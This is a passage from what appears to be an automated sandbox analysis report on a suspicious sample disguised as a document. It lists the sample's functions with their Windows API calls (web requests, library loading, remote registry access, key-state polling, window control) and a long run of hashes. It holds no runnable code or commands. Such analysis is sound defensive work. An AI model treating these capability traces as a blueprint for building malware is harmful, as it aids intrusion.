                                                        • Instruction ID: e9edcf0578033198e93a2883e3942f9726e7c00729c7f0663850e8cbc0921980
                                                        • Opcode Fuzzy Hash: 04b66d720f8d5d266a8b788d6911c684b3793fee632487dc30457a64508b52f3
                                                        • Instruction Fuzzy Hash: 26212371901108BEDB1AEBA8C88ADFFB7B8DF45350B11811AF422E31E1DB7C4D4AD660
                                                        Function 00764A41 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00764A60
                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00764A86
                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00764AB6
                                                        • InternetCloseHandle.WININET(00000000), ref: 00764AFD
                                                          • Part of subcall function 007656A9: GetLastError.KERNEL32(?,?,00764A2B,00000000,00000000,00000001), ref: 007656BE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                        • String ID:
                                                        • API String ID: 1951874230-3916222277
                                                        • Opcode ID: c1c9499c24af68741c0dcd82b0cedd4d5666a4a8f79d54820bc0ed7992a307b9
                                                        • Instruction ID: fcc8278c2cbb090eaaf8563c820949da9396158bb9618dc8228c8bbc8e354637
                                                        • Opcode Fuzzy Hash: c1c9499c24af68741c0dcd82b0cedd4d5666a4a8f79d54820bc0ed7992a307b9
                                                        • Instruction Fuzzy Hash: 812192B5540608BFEB11DFA4DC89EBB76ECEB48744F10801AF90696140EA689D059775
                                                        Function 00778EEF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0072C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0072C657
                                                          • Part of subcall function 0072C619: GetStockObject.GDI32(00000011), ref: 0072C66B
                                                          • Part of subcall function 0072C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0072C675
                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00778F69
                                                        • LoadLibraryW.KERNEL32(?), ref: 00778F70
                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00778F85
                                                        • DestroyWindow.USER32(?), ref: 00778F8D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                        • String ID: SysAnimate32
                                                        • API String ID: 4146253029-1011021900
                                                        • Opcode ID: 9ac274636cae5ae04ce2c6543d53f8e6f6edf252fa1abd816699e5289fabdac1
                                                        • Instruction ID: 699e5f2d311c8f6ee54430b267d2dc5615484e0f9b81a62fb67a53688be8510c
                                                        • Opcode Fuzzy Hash: 9ac274636cae5ae04ce2c6543d53f8e6f6edf252fa1abd816699e5289fabdac1
                                                        • Instruction Fuzzy Hash: C7219D71240205AFEF504F64DC48EBB37AAEB593A4F108629FA18D7190CB79DC519762
                                                        Function 0075E382 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0075E392
                                                        • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 0075E3E6
                                                        • __swprintf.LIBCMT ref: 0075E3FF
                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,007ADBF0), ref: 0075E43D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                        • String ID: %lu
                                                        • API String ID: 3164766367-685833217
                                                        • Opcode ID: efe76562a4e92f83352a7a45a4dfabb4e5dc102d9d26b3236370f4b4288b7923
                                                        • Instruction ID: eb917efe094b02bd19e38f57332fc71514d2f5d5c70812c95e5378adfa29905c
                                                        • Opcode Fuzzy Hash: efe76562a4e92f83352a7a45a4dfabb4e5dc102d9d26b3236370f4b4288b7923
                                                        • Instruction Fuzzy Hash: C1216D75A40108EFCB10EFA4C889DEE77B9EF89711B108069F909D7291D675DE46CB60
                                                        Function 0074D7D6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00717E53: _memmove.LIBCMT ref: 00717EB9
                                                          • Part of subcall function 0074D623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0074D640
                                                          • Part of subcall function 0074D623: GetWindowThreadProcessId.USER32(?,00000000), ref: 0074D653
                                                          • Part of subcall function 0074D623: GetCurrentThreadId.KERNEL32 ref: 0074D65A
                                                          • Part of subcall function 0074D623: AttachThreadInput.USER32(00000000), ref: 0074D661
                                                        • GetFocus.USER32 ref: 0074D7FB
                                                          • Part of subcall function 0074D66C: GetParent.USER32(?), ref: 0074D67A
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0074D844
                                                        • EnumChildWindows.USER32(?,0074D8BA), ref: 0074D86C
                                                        • __swprintf.LIBCMT ref: 0074D886
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                        • String ID: %s%d
                                                        • API String ID: 1941087503-1110647743
                                                        • Opcode ID: cd7788a2b185d88c400b8a6aeade3fc9c5c973a953ee43483dee5ed95a9ea34f
                                                        • Instruction ID: 46ca67f56f0a8d5ad63bda83924a80280762c02ca40567384c43837262e92fb7
                                                        • Opcode Fuzzy Hash: cd7788a2b185d88c400b8a6aeade3fc9c5c973a953ee43483dee5ed95a9ea34f
                                                        • Instruction Fuzzy Hash: 011184B5500205ABDF217F948C89FFA377DAB44744F0080B9BE49AA186DB7C9D45CB71
                                                        Function 00771836 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007718E4
                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00771917
                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00771A3A
                                                        • CloseHandle.KERNEL32(?), ref: 00771AB0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                        • String ID:
                                                        • API String ID: 2364364464-0
                                                        • Opcode ID: e2604d6110c03caf4d9bb83f4d0df54e23ab238aace25a6098368cb42e42b448
                                                        • Instruction ID: b2a7357c6b7ea21264c6fad725eab68f9563ec13459449fc80ef0121c93fe147
                                                        • Opcode Fuzzy Hash: e2604d6110c03caf4d9bb83f4d0df54e23ab238aace25a6098368cb42e42b448
                                                        • Instruction Fuzzy Hash: A9817570A40214EBDF10AF68C896B9D7BF5AF48720F55C059F909AF382D7B8E9418B91
                                                        Function 00770579 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007184A6: __swprintf.LIBCMT ref: 007184E5
                                                          • Part of subcall function 007184A6: __itow.LIBCMT ref: 00718519
                                                        • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 007705DF
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0077066E
                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0077068C
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 007706D2
                                                        • FreeLibrary.KERNEL32(00000000,00000004), ref: 007706EC
                                                          • Part of subcall function 0072F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0075AEA5,?,?,00000000,00000008), ref: 0072F282
                                                          • Part of subcall function 0072F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0075AEA5,?,?,00000000,00000008), ref: 0072F2A6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 327935632-0
                                                        • Opcode ID: c1fbf2124ef6460075516c97d989942410f3f6b9ba28b64aa4398296569014a5
                                                        • Instruction ID: 0713c7c38a33d6c246ea9ae01dc2696d2028c52ad6cd58e681d68bec8e816ced
                                                        • Opcode Fuzzy Hash: c1fbf2124ef6460075516c97d989942410f3f6b9ba28b64aa4398296569014a5
                                                        • Instruction Fuzzy Hash: 4B515975A00205EFCF04EFA8C8949EDB7B5BF49310B14C069E959AB391DB38ED45CB91
                                                        Function 00772D1A Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                          • Part of subcall function 00773AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00772AA6,?,?), ref: 00773B0E
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00772DE0
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00772E1F
                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00772E66
                                                        • RegCloseKey.ADVAPI32(?,?), ref: 00772E92
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00772E9F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                        • String ID:
                                                        • API String ID: 3440857362-0
                                                        • Opcode ID: d01bb9b016d571a0c019a24d5f55180a693cebf8866188098eac614754395f24
                                                        • Instruction ID: 54f311fd2d3d9b1bc61b9a05439dc8d5251ec507cf289e43711c9dadc36815f8
                                                        • Opcode Fuzzy Hash: d01bb9b016d571a0c019a24d5f55180a693cebf8866188098eac614754395f24
                                                        • Instruction Fuzzy Hash: E8517D71204204EFCB14EF68C885EAAB7E8FF88354F00881EF595871A1DB78ED45CB52
                                                        Function 0077CB07 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: df2c49ef33a3d2750497e9a19b7c1edc221d9dd10d075db16a0a04e01376a40c
                                                        • Instruction ID: dd96767dec5d1c49f79b6c9740cde6ea27440cf68412563fd3bad61ca55c6b15
                                                        • Opcode Fuzzy Hash: df2c49ef33a3d2750497e9a19b7c1edc221d9dd10d075db16a0a04e01376a40c
                                                        • Instruction Fuzzy Hash: 0C41E275900104ABDF22DF78CC49FA9BB79AB0D3A0F15816AF81DA72E1C7389D41D664
                                                        Function 00761726 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 007617D4
                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 007617FD
                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0076183C
                                                          • Part of subcall function 007184A6: __swprintf.LIBCMT ref: 007184E5
                                                          • Part of subcall function 007184A6: __itow.LIBCMT ref: 00718519
                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00761861
                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00761869
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 1389676194-0
                                                        • Opcode ID: 09a34f01965a2532b99869c3f6df89648c775f1d7c8c5018004d52dd69306f3d
                                                        • Instruction ID: dd035e048d59dba65d2c190d23060847ebcd116c64c1d1028067e48f9ae99018
                                                        • Opcode Fuzzy Hash: 09a34f01965a2532b99869c3f6df89648c775f1d7c8c5018004d52dd69306f3d
                                                        • Instruction Fuzzy Hash: 90410B35A00205DFCB11EF64C995AADBBF5FF48310B148099E806AF3A1DB39ED51DB91
                                                        Function 0072B736 Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCursorPos.USER32(000000FF), ref: 0072B749
                                                        • ScreenToClient.USER32(00000000,000000FF), ref: 0072B766
                                                        • GetAsyncKeyState.USER32(00000001), ref: 0072B78B
                                                        • GetAsyncKeyState.USER32(00000002), ref: 0072B799
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AsyncState$ClientCursorScreen
                                                        • String ID:
                                                        • API String ID: 4210589936-0
                                                        • Opcode ID: fea2d8a8880471b81134267901c9f096e4c43baa0cb83dfe81cfb252978a74c4
                                                        • Instruction ID: 343a31a1abadd2537c7482385d4a5b3bcded19ceb967374c23b867aff7bf2184
                                                        • Opcode Fuzzy Hash: fea2d8a8880471b81134267901c9f096e4c43baa0cb83dfe81cfb252978a74c4
                                                        • Instruction Fuzzy Hash: A6418131604119FFDF159F64C888AE9BBB4FB45364F10835AF82992290C738AD50DBA1
                                                        Function 0074C145 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 0074C156
                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 0074C200
                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0074C208
                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 0074C216
                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0074C21E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessagePostSleep$RectWindow
                                                        • String ID:
                                                        • API String ID: 3382505437-0
                                                        • Opcode ID: 1a221a143d714da35b8aea3e8437ade0227aec8cd2d6af980de15a65cea6ab45
                                                        • Instruction ID: afc8acab68945f9ec6596dc7d8d82e46aef71a1d99fd15c987650b5247951af9
                                                        • Opcode Fuzzy Hash: 1a221a143d714da35b8aea3e8437ade0227aec8cd2d6af980de15a65cea6ab45
                                                        • Instruction Fuzzy Hash: B431BFB250121DEBDF14CFA8DE4DA9E3BB5EB04315F108229F925AB2D1C7B89D14DB90
                                                        Function 0074E9B5 Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 0074E9CD
                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0074E9EA
                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0074EA22
                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0074EA48
                                                        • _wcsstr.LIBCMT ref: 0074EA52
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                        • String ID:
                                                        • API String ID: 3902887630-0
                                                        • Opcode ID: e1493db955303be9cceed979a72ca5246ce842faf5e197dfc654ca84b53aa305
                                                        • Instruction ID: 69694f3a8889ccd4e761286d6a342707fdf84085e12b3809c88a8f2d76ea33c6
                                                        • Opcode Fuzzy Hash: e1493db955303be9cceed979a72ca5246ce842faf5e197dfc654ca84b53aa305
                                                        • Instruction Fuzzy Hash: 9D21F672204204BBEB259B79DC49E7F7BA8FF45760F10C03AF809CA092DB69DC4196A1
                                                        Function 0077DC79 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0072AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0072AF8E
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0077DCC0
                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0077DCE4
                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0077DCFC
                                                        • GetSystemMetrics.USER32(00000004), ref: 0077DD24
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,0076407D,00000000), ref: 0077DD42
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$Long$MetricsSystem
                                                        • String ID:
                                                        • API String ID: 2294984445-0
                                                        • Opcode ID: 17953139e1dde90ac5292262e53218bf8de2ff79e016cc6f33d49b37f4b57c17
